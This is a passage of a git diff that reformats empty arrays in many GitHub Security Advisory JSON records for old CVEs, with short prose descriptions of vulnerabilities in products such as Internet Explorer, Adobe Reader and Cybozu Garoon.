CVE-2015-7618, CVE-2015-7619, CVE-2015-7620, and CVE-2015-7623.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-cjjg-wwvx-68qm/GHSA-cjjg-wwvx-68qm.json b/advisories/unreviewed/2022/05/GHSA-cjjg-wwvx-68qm/GHSA-cjjg-wwvx-68qm.json index f3421118f4e..3f43244e286 100644 --- a/advisories/unreviewed/2022/05/GHSA-cjjg-wwvx-68qm/GHSA-cjjg-wwvx-68qm.json +++ b/advisories/unreviewed/2022/05/GHSA-cjjg-wwvx-68qm/GHSA-cjjg-wwvx-68qm.json @@ -7,12 +7,8 @@ "CVE-2014-3778" ], "details": "Multiple cross-site request forgery (CSRF) vulnerabilities in goform/RgDdns in ARRIS (formerly Motorola) SBG901 SURFboard Wireless Cable Modem allow remote attackers to hijack the authentication of administrators for requests that (1) change the dns service via the DdnsService parameter, (2) change the username via the DdnsUserName parameter, (3) change the password via the DdnsPassword parameter, or (4) change the host name via the DdnsHostName parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cqf2-7gg9-99ph/GHSA-cqf2-7gg9-99ph.json b/advisories/unreviewed/2022/05/GHSA-cqf2-7gg9-99ph/GHSA-cqf2-7gg9-99ph.json index 1c7f1f2b6ce..5b4b2ba769a 100644 --- a/advisories/unreviewed/2022/05/GHSA-cqf2-7gg9-99ph/GHSA-cqf2-7gg9-99ph.json +++ b/advisories/unreviewed/2022/05/GHSA-cqf2-7gg9-99ph/GHSA-cqf2-7gg9-99ph.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cqgx-5gh9-5jwx/GHSA-cqgx-5gh9-5jwx.json b/advisories/unreviewed/2022/05/GHSA-cqgx-5gh9-5jwx/GHSA-cqgx-5gh9-5jwx.json index c38ea1c2653..1f41f83cff4 100644 --- a/advisories/unreviewed/2022/05/GHSA-cqgx-5gh9-5jwx/GHSA-cqgx-5gh9-5jwx.json +++ b/advisories/unreviewed/2022/05/GHSA-cqgx-5gh9-5jwx/GHSA-cqgx-5gh9-5jwx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cqhw-84qp-rmjx/GHSA-cqhw-84qp-rmjx.json b/advisories/unreviewed/2022/05/GHSA-cqhw-84qp-rmjx/GHSA-cqhw-84qp-rmjx.json index 782f8ac81b9..bcc23abe9f1 100644 --- a/advisories/unreviewed/2022/05/GHSA-cqhw-84qp-rmjx/GHSA-cqhw-84qp-rmjx.json +++ b/advisories/unreviewed/2022/05/GHSA-cqhw-84qp-rmjx/GHSA-cqhw-84qp-rmjx.json @@ -7,12 +7,8 @@ "CVE-2010-1951" ], "details": "Multiple directory traversal vulnerabilities in 60cycleCMS allow remote attackers to include and execute arbitrary local files via directory traversal sequences in the DOCUMENT_ROOT parameter to (1) news.php, (2) submitComment.php, and (3) sqlConnect.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-crmv-fcq6-r57v/GHSA-crmv-fcq6-r57v.json b/advisories/unreviewed/2022/05/GHSA-crmv-fcq6-r57v/GHSA-crmv-fcq6-r57v.json index 249454e07be..36eb67e2b1a 100644 --- a/advisories/unreviewed/2022/05/GHSA-crmv-fcq6-r57v/GHSA-crmv-fcq6-r57v.json +++ b/advisories/unreviewed/2022/05/GHSA-crmv-fcq6-r57v/GHSA-crmv-fcq6-r57v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cwx9-2ppf-5628/GHSA-cwx9-2ppf-5628.json b/advisories/unreviewed/2022/05/GHSA-cwx9-2ppf-5628/GHSA-cwx9-2ppf-5628.json index 41a24746be3..fa018111cbf 100644 --- a/advisories/unreviewed/2022/05/GHSA-cwx9-2ppf-5628/GHSA-cwx9-2ppf-5628.json +++ b/advisories/unreviewed/2022/05/GHSA-cwx9-2ppf-5628/GHSA-cwx9-2ppf-5628.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-cx74-jcx5-x32v/GHSA-cx74-jcx5-x32v.json b/advisories/unreviewed/2022/05/GHSA-cx74-jcx5-x32v/GHSA-cx74-jcx5-x32v.json index c7652184434..f4dc428b3cb 100644 --- a/advisories/unreviewed/2022/05/GHSA-cx74-jcx5-x32v/GHSA-cx74-jcx5-x32v.json +++ b/advisories/unreviewed/2022/05/GHSA-cx74-jcx5-x32v/GHSA-cx74-jcx5-x32v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f29f-jrc4-qmh5/GHSA-f29f-jrc4-qmh5.json b/advisories/unreviewed/2022/05/GHSA-f29f-jrc4-qmh5/GHSA-f29f-jrc4-qmh5.json index 7e5429e4aee..600e89be149 100644 --- a/advisories/unreviewed/2022/05/GHSA-f29f-jrc4-qmh5/GHSA-f29f-jrc4-qmh5.json +++ b/advisories/unreviewed/2022/05/GHSA-f29f-jrc4-qmh5/GHSA-f29f-jrc4-qmh5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f4xm-w85j-gc55/GHSA-f4xm-w85j-gc55.json b/advisories/unreviewed/2022/05/GHSA-f4xm-w85j-gc55/GHSA-f4xm-w85j-gc55.json index 6dd0d6124bc..566578f5b42 100644 --- a/advisories/unreviewed/2022/05/GHSA-f4xm-w85j-gc55/GHSA-f4xm-w85j-gc55.json +++ b/advisories/unreviewed/2022/05/GHSA-f4xm-w85j-gc55/GHSA-f4xm-w85j-gc55.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f52f-8ffp-vg49/GHSA-f52f-8ffp-vg49.json b/advisories/unreviewed/2022/05/GHSA-f52f-8ffp-vg49/GHSA-f52f-8ffp-vg49.json index 338de5b0bca..0d1416164ce 100644 --- a/advisories/unreviewed/2022/05/GHSA-f52f-8ffp-vg49/GHSA-f52f-8ffp-vg49.json +++ b/advisories/unreviewed/2022/05/GHSA-f52f-8ffp-vg49/GHSA-f52f-8ffp-vg49.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f5h8-wfwr-29f4/GHSA-f5h8-wfwr-29f4.json b/advisories/unreviewed/2022/05/GHSA-f5h8-wfwr-29f4/GHSA-f5h8-wfwr-29f4.json index 928ddc239b3..a3e315bbb13 100644 --- a/advisories/unreviewed/2022/05/GHSA-f5h8-wfwr-29f4/GHSA-f5h8-wfwr-29f4.json +++ b/advisories/unreviewed/2022/05/GHSA-f5h8-wfwr-29f4/GHSA-f5h8-wfwr-29f4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f8r4-2qvp-3vpw/GHSA-f8r4-2qvp-3vpw.json b/advisories/unreviewed/2022/05/GHSA-f8r4-2qvp-3vpw/GHSA-f8r4-2qvp-3vpw.json index 5cb59b7e10e..d423d232c54 100644 --- a/advisories/unreviewed/2022/05/GHSA-f8r4-2qvp-3vpw/GHSA-f8r4-2qvp-3vpw.json +++ b/advisories/unreviewed/2022/05/GHSA-f8r4-2qvp-3vpw/GHSA-f8r4-2qvp-3vpw.json @@ -7,12 +7,8 @@ "CVE-2010-4487" ], "details": "Incomplete blacklist vulnerability in Google Chrome before 8.0.552.215 on Linux and Mac OS X allows remote attackers to have an unspecified impact via a \"dangerous file.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-f929-r9fw-2vjq/GHSA-f929-r9fw-2vjq.json b/advisories/unreviewed/2022/05/GHSA-f929-r9fw-2vjq/GHSA-f929-r9fw-2vjq.json index 7658124c8ce..6d83b998184 100644 --- a/advisories/unreviewed/2022/05/GHSA-f929-r9fw-2vjq/GHSA-f929-r9fw-2vjq.json +++ b/advisories/unreviewed/2022/05/GHSA-f929-r9fw-2vjq/GHSA-f929-r9fw-2vjq.json @@ -7,12 +7,8 @@ "CVE-2008-7236" ], "details": "Unspecified vulnerability in the Oracle JDeveloper component in Oracle Application Server 10.1.2.2 and 10.1.3.1 allows remote attackers to affect integrity via unknown vectors, aka AS05.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-fc7r-qxmj-ff6j/GHSA-fc7r-qxmj-ff6j.json b/advisories/unreviewed/2022/05/GHSA-fc7r-qxmj-ff6j/GHSA-fc7r-qxmj-ff6j.json index 019f0ef8213..e434e414111 100644 --- a/advisories/unreviewed/2022/05/GHSA-fc7r-qxmj-ff6j/GHSA-fc7r-qxmj-ff6j.json +++ b/advisories/unreviewed/2022/05/GHSA-fc7r-qxmj-ff6j/GHSA-fc7r-qxmj-ff6j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-ff3x-x3rg-h387/GHSA-ff3x-x3rg-h387.json b/advisories/unreviewed/2022/05/GHSA-ff3x-x3rg-h387/GHSA-ff3x-x3rg-h387.json index f8790537fc0..e34d00a01e5 100644 --- a/advisories/unreviewed/2022/05/GHSA-ff3x-x3rg-h387/GHSA-ff3x-x3rg-h387.json +++ b/advisories/unreviewed/2022/05/GHSA-ff3x-x3rg-h387/GHSA-ff3x-x3rg-h387.json @@ -7,12 +7,8 @@ "CVE-2012-4817" ], "details": "The NFSv4 client implementation in IBM AIX 5.3, 6.1, and 7.1, and VIOS before 2.2.1.4-FP-25 SP-02, does not properly handle GID values, which allows remote attackers to cause a denial of service via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -64,9 +60,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-ffj6-5gww-48qc/GHSA-ffj6-5gww-48qc.json b/advisories/unreviewed/2022/05/GHSA-ffj6-5gww-48qc/GHSA-ffj6-5gww-48qc.json index 97753824ed0..54c47ac42e7 100644 --- a/advisories/unreviewed/2022/05/GHSA-ffj6-5gww-48qc/GHSA-ffj6-5gww-48qc.json +++ b/advisories/unreviewed/2022/05/GHSA-ffj6-5gww-48qc/GHSA-ffj6-5gww-48qc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-ffj6-rf7h-c479/GHSA-ffj6-rf7h-c479.json b/advisories/unreviewed/2022/05/GHSA-ffj6-rf7h-c479/GHSA-ffj6-rf7h-c479.json index 201759c1b60..2bbe5686ba5 100644 --- a/advisories/unreviewed/2022/05/GHSA-ffj6-rf7h-c479/GHSA-ffj6-rf7h-c479.json +++ b/advisories/unreviewed/2022/05/GHSA-ffj6-rf7h-c479/GHSA-ffj6-rf7h-c479.json @@ -7,12 +7,8 @@ "CVE-2014-9751" ], "details": "The read_network_packet function in ntp_io.c in ntpd in NTP 4.x before 4.2.8p1 on Linux and OS X does not properly determine whether a source IP address is an IPv6 loopback address, which makes it easier for remote attackers to spoof restricted packets, and read or write to the runtime state, by leveraging the ability to reach the ntpd machine's network interface with a packet from the ::1 address.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-ffmr-63f5-v2qx/GHSA-ffmr-63f5-v2qx.json b/advisories/unreviewed/2022/05/GHSA-ffmr-63f5-v2qx/GHSA-ffmr-63f5-v2qx.json index c0bb8cd5ada..298be0ddba1 100644 --- a/advisories/unreviewed/2022/05/GHSA-ffmr-63f5-v2qx/GHSA-ffmr-63f5-v2qx.json +++ b/advisories/unreviewed/2022/05/GHSA-ffmr-63f5-v2qx/GHSA-ffmr-63f5-v2qx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fgw9-vc8g-ccqw/GHSA-fgw9-vc8g-ccqw.json b/advisories/unreviewed/2022/05/GHSA-fgw9-vc8g-ccqw/GHSA-fgw9-vc8g-ccqw.json index 6911023c46e..8922a5ff24e 100644 --- a/advisories/unreviewed/2022/05/GHSA-fgw9-vc8g-ccqw/GHSA-fgw9-vc8g-ccqw.json +++ b/advisories/unreviewed/2022/05/GHSA-fgw9-vc8g-ccqw/GHSA-fgw9-vc8g-ccqw.json @@ -7,12 +7,8 @@ "CVE-2013-3287" ], "details": "EMC Unisphere for VMAX before 1.6.1.6, when using an unspecified level of debug logging in LDAP configurations, allows local users to discover the cleartext LDAP bind password by reading the console.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-fmm9-qvpf-ffg7/GHSA-fmm9-qvpf-ffg7.json b/advisories/unreviewed/2022/05/GHSA-fmm9-qvpf-ffg7/GHSA-fmm9-qvpf-ffg7.json index ead849a796c..61ee9805ea1 100644 --- a/advisories/unreviewed/2022/05/GHSA-fmm9-qvpf-ffg7/GHSA-fmm9-qvpf-ffg7.json +++ b/advisories/unreviewed/2022/05/GHSA-fmm9-qvpf-ffg7/GHSA-fmm9-qvpf-ffg7.json @@ -7,12 +7,8 @@ "CVE-2012-1878" ], "details": "Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka \"OnBeforeDeactivate Event Remote Code Execution Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fp88-gm7q-v687/GHSA-fp88-gm7q-v687.json b/advisories/unreviewed/2022/05/GHSA-fp88-gm7q-v687/GHSA-fp88-gm7q-v687.json index a9203f834c3..e5bf71ee8bd 100644 --- a/advisories/unreviewed/2022/05/GHSA-fp88-gm7q-v687/GHSA-fp88-gm7q-v687.json +++ b/advisories/unreviewed/2022/05/GHSA-fp88-gm7q-v687/GHSA-fp88-gm7q-v687.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fq52-jg4q-73hp/GHSA-fq52-jg4q-73hp.json b/advisories/unreviewed/2022/05/GHSA-fq52-jg4q-73hp/GHSA-fq52-jg4q-73hp.json index 7ac5ebbd06a..d1a47ede804 100644 --- a/advisories/unreviewed/2022/05/GHSA-fq52-jg4q-73hp/GHSA-fq52-jg4q-73hp.json +++ b/advisories/unreviewed/2022/05/GHSA-fq52-jg4q-73hp/GHSA-fq52-jg4q-73hp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fq7p-pw38-3h7f/GHSA-fq7p-pw38-3h7f.json b/advisories/unreviewed/2022/05/GHSA-fq7p-pw38-3h7f/GHSA-fq7p-pw38-3h7f.json index 18fa0b8eede..0ab006b7d7b 100644 --- a/advisories/unreviewed/2022/05/GHSA-fq7p-pw38-3h7f/GHSA-fq7p-pw38-3h7f.json +++ b/advisories/unreviewed/2022/05/GHSA-fq7p-pw38-3h7f/GHSA-fq7p-pw38-3h7f.json @@ -7,12 +7,8 @@ "CVE-2015-4443" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to cause a denial of service (NULL pointer dereference) via unspecified vectors, a different vulnerability than CVE-2015-4444.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-frx9-m86f-mhgc/GHSA-frx9-m86f-mhgc.json b/advisories/unreviewed/2022/05/GHSA-frx9-m86f-mhgc/GHSA-frx9-m86f-mhgc.json index a80efec0d2f..ebe5ab9e3ab 100644 --- a/advisories/unreviewed/2022/05/GHSA-frx9-m86f-mhgc/GHSA-frx9-m86f-mhgc.json +++ b/advisories/unreviewed/2022/05/GHSA-frx9-m86f-mhgc/GHSA-frx9-m86f-mhgc.json @@ -7,12 +7,8 @@ "CVE-2008-6893" ], "details": "Cross-site scripting (XSS) vulnerability in Alt-N MDaemon WorldClient 10.0.2, when Internet Explorer 7 is used, allows remote attackers to inject arbitrary web script or HTML via a crafted img tag.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-frxq-rh6g-9694/GHSA-frxq-rh6g-9694.json b/advisories/unreviewed/2022/05/GHSA-frxq-rh6g-9694/GHSA-frxq-rh6g-9694.json index 0a3484ea480..c81c612e751 100644 --- a/advisories/unreviewed/2022/05/GHSA-frxq-rh6g-9694/GHSA-frxq-rh6g-9694.json +++ b/advisories/unreviewed/2022/05/GHSA-frxq-rh6g-9694/GHSA-frxq-rh6g-9694.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fx3h-5xv5-mvwq/GHSA-fx3h-5xv5-mvwq.json b/advisories/unreviewed/2022/05/GHSA-fx3h-5xv5-mvwq/GHSA-fx3h-5xv5-mvwq.json index fa6af888559..d4f9337db5a 100644 --- a/advisories/unreviewed/2022/05/GHSA-fx3h-5xv5-mvwq/GHSA-fx3h-5xv5-mvwq.json +++ b/advisories/unreviewed/2022/05/GHSA-fx3h-5xv5-mvwq/GHSA-fx3h-5xv5-mvwq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fxc3-452x-46r5/GHSA-fxc3-452x-46r5.json b/advisories/unreviewed/2022/05/GHSA-fxc3-452x-46r5/GHSA-fxc3-452x-46r5.json index 0f4347081ca..559b27d2491 100644 --- a/advisories/unreviewed/2022/05/GHSA-fxc3-452x-46r5/GHSA-fxc3-452x-46r5.json +++ b/advisories/unreviewed/2022/05/GHSA-fxc3-452x-46r5/GHSA-fxc3-452x-46r5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fxmf-f924-v8j4/GHSA-fxmf-f924-v8j4.json b/advisories/unreviewed/2022/05/GHSA-fxmf-f924-v8j4/GHSA-fxmf-f924-v8j4.json index ec66b2fa79d..84d02effe7e 100644 --- a/advisories/unreviewed/2022/05/GHSA-fxmf-f924-v8j4/GHSA-fxmf-f924-v8j4.json +++ b/advisories/unreviewed/2022/05/GHSA-fxmf-f924-v8j4/GHSA-fxmf-f924-v8j4.json @@ -7,12 +7,8 @@ "CVE-2013-6904" ], "details": "Cross-site scripting (XSS) vulnerability in a note component in Cybozu Garoon before 3.7.0, when Internet Explorer or Firefox is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g22h-4p64-r22q/GHSA-g22h-4p64-r22q.json b/advisories/unreviewed/2022/05/GHSA-g22h-4p64-r22q/GHSA-g22h-4p64-r22q.json index e41cbec42ca..58dd12772b3 100644 --- a/advisories/unreviewed/2022/05/GHSA-g22h-4p64-r22q/GHSA-g22h-4p64-r22q.json +++ b/advisories/unreviewed/2022/05/GHSA-g22h-4p64-r22q/GHSA-g22h-4p64-r22q.json @@ -7,12 +7,8 @@ "CVE-2013-2555" ], "details": "Integer overflow in Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on Windows and Mac OS X, before 10.3.183.75 and 11.x before 11.2.202.280 on Linux, before 11.1.111.50 on Android 2.x and 3.x, and before 11.1.115.54 on Android 4.x; Adobe AIR before 3.7.0.1530; and Adobe AIR SDK & Compiler before 3.7.0.1530 allows remote attackers to execute arbitrary code via unspecified vectors, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2013.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g6j6-f58r-vgxm/GHSA-g6j6-f58r-vgxm.json b/advisories/unreviewed/2022/05/GHSA-g6j6-f58r-vgxm/GHSA-g6j6-f58r-vgxm.json index e498fefe9a6..5cd32498d98 100644 --- a/advisories/unreviewed/2022/05/GHSA-g6j6-f58r-vgxm/GHSA-g6j6-f58r-vgxm.json +++ b/advisories/unreviewed/2022/05/GHSA-g6j6-f58r-vgxm/GHSA-g6j6-f58r-vgxm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -67,9 +65,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-g75p-hv6w-h9rw/GHSA-g75p-hv6w-h9rw.json b/advisories/unreviewed/2022/05/GHSA-g75p-hv6w-h9rw/GHSA-g75p-hv6w-h9rw.json index 97075ba1614..03d8fcc0a57 100644 --- a/advisories/unreviewed/2022/05/GHSA-g75p-hv6w-h9rw/GHSA-g75p-hv6w-h9rw.json +++ b/advisories/unreviewed/2022/05/GHSA-g75p-hv6w-h9rw/GHSA-g75p-hv6w-h9rw.json @@ -7,12 +7,8 @@ "CVE-2013-6911" ], "details": "Cross-site scripting (XSS) vulnerability in the bulletin-board component in Cybozu Garoon before 3.7.2, when Internet Explorer or Firefox is used, allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g76p-q66j-mc8v/GHSA-g76p-q66j-mc8v.json b/advisories/unreviewed/2022/05/GHSA-g76p-q66j-mc8v/GHSA-g76p-q66j-mc8v.json index 413d34f37b8..9e35dfd8b5f 100644 --- a/advisories/unreviewed/2022/05/GHSA-g76p-q66j-mc8v/GHSA-g76p-q66j-mc8v.json +++ b/advisories/unreviewed/2022/05/GHSA-g76p-q66j-mc8v/GHSA-g76p-q66j-mc8v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g7fj-5g36-4chw/GHSA-g7fj-5g36-4chw.json b/advisories/unreviewed/2022/05/GHSA-g7fj-5g36-4chw/GHSA-g7fj-5g36-4chw.json index 94dbb4a25f2..5d5493c220d 100644 --- a/advisories/unreviewed/2022/05/GHSA-g7fj-5g36-4chw/GHSA-g7fj-5g36-4chw.json +++ b/advisories/unreviewed/2022/05/GHSA-g7fj-5g36-4chw/GHSA-g7fj-5g36-4chw.json @@ -7,12 +7,8 @@ "CVE-2012-1877" ], "details": "Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka \"Title Element Change Remote Code Execution Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g8r7-88vw-g9xx/GHSA-g8r7-88vw-g9xx.json b/advisories/unreviewed/2022/05/GHSA-g8r7-88vw-g9xx/GHSA-g8r7-88vw-g9xx.json index 0fd0cda8bfe..bffdb31617a 100644 --- a/advisories/unreviewed/2022/05/GHSA-g8r7-88vw-g9xx/GHSA-g8r7-88vw-g9xx.json +++ b/advisories/unreviewed/2022/05/GHSA-g8r7-88vw-g9xx/GHSA-g8r7-88vw-g9xx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gcjw-64c9-27vr/GHSA-gcjw-64c9-27vr.json b/advisories/unreviewed/2022/05/GHSA-gcjw-64c9-27vr/GHSA-gcjw-64c9-27vr.json index 349459d397f..5cba9e2ddbe 100644 --- a/advisories/unreviewed/2022/05/GHSA-gcjw-64c9-27vr/GHSA-gcjw-64c9-27vr.json +++ b/advisories/unreviewed/2022/05/GHSA-gcjw-64c9-27vr/GHSA-gcjw-64c9-27vr.json @@ -7,12 +7,8 @@ "CVE-2011-2382" ], "details": "Microsoft Internet Explorer 8 and earlier, and Internet Explorer 9 beta, does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing a file: URL, as demonstrated by a Facebook game, related to a \"cookiejacking\" issue.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gfcx-q3c4-f4p5/GHSA-gfcx-q3c4-f4p5.json b/advisories/unreviewed/2022/05/GHSA-gfcx-q3c4-f4p5/GHSA-gfcx-q3c4-f4p5.json index 1d7ff692314..6cfeffcbeee 100644 --- a/advisories/unreviewed/2022/05/GHSA-gfcx-q3c4-f4p5/GHSA-gfcx-q3c4-f4p5.json +++ b/advisories/unreviewed/2022/05/GHSA-gfcx-q3c4-f4p5/GHSA-gfcx-q3c4-f4p5.json @@ -7,12 +7,8 @@ "CVE-2015-5102" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-3095, CVE-2015-5087, CVE-2015-5094, 